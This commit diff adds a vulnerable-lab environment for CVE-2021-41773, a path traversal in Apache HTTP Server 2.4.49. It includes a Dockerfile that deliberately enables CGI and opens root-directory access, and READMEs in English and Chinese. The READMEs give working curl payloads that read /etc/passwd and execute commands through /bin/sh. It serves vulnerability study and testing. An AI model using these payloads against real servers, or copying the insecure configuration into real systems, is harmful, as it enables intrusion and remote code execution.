first commit

httpd/CVE-2021-41773/Dockerfile

@@ -0,0 +1,14 @@
+FROM vulhub/httpd:2.4.49
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
+    && cat /usr/local/apache2/conf/httpd.conf \
+        | tr '\n' '\r' \
+        | perl -pe 's|<Directory />.*?</Directory>|<Directory />\n    AllowOverride none\n    Require all granted\n</Directory>|isg' \
+        | tr '\r' '\n' \
+        | tee /tmp/httpd.conf \
+    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf

httpd/CVE-2021-41773/README.md

@@ -0,0 +1,47 @@
+# Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows.
+
+A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root.
+
+If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.
+
+References:
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/ptswarm/status/1445376079548624899
+- https://twitter.com/HackerGautam/status/1445412108863041544
+- https://twitter.com/snyff/status/1445565903161102344
+
+## Vulnerable environment
+
+Execute following commands to start a vulnerable Apache HTTP Server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, you can see the default page which says `It works!` of Apache HTTP Server through `http://your-ip:8080`.
+
+## Exploit
+
+A simple CURL command to reproduce the vulnerability (Note that `/icons/` must be a existing directory):
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+```
+
+The `/etc/passwd` is disclosured successfully:
+
+![](1.png)
+
+With the mods cgi or cgid enabled on the server, this path traversal vulnerability would allow arbitrary command execution:
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
+```
+
+![](2.png)

httpd/CVE-2021-41773/README.zh-cn.md

@@ -0,0 +1,46 @@
+# Apache HTTP Server 2.4.49 路径穿越漏洞（CVE-2021-41773）
+
+Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中，引入了一个路径穿越漏洞，满足下面两个条件的Apache服务器将会受到影响：
+
+- 版本等于2.4.49
+- 穿越的目录允许被访问，比如配置了`<Directory />Require all granted</Directory>`。（默认情况下是不允许的）
+
+攻击者利用这个漏洞，可以读取位于Apache服务器Web目录以外的其他文件，或者读取Web目录中的脚本文件源码，或者在开启了cgi或cgid的服务器上执行任意命令。
+
+参考链接：
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/ptswarm/status/1445376079548624899
+- https://twitter.com/HackerGautam/status/1445412108863041544
+- https://twitter.com/snyff/status/1445565903161102344
+
+## 漏洞环境
+
+执行如下命令编译及运行一个存在漏洞的Apache HTTPd 2.4.49版本服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可看到Apache默认的`It works!`页面。
+
+## 漏洞利用
+
+使用如下CURL命令来发送Payload（注意其中的`/icons/`必须是一个存在且可访问的目录）：
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+```
+
+可见，成功读取到`/etc/passwd`：
+
+![](1.png)
+
+在服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令：
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
+```
+
+![](2.png)

httpd/CVE-2021-41773/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ apache:
+   build: .
+   ports:
+    - "8080:80"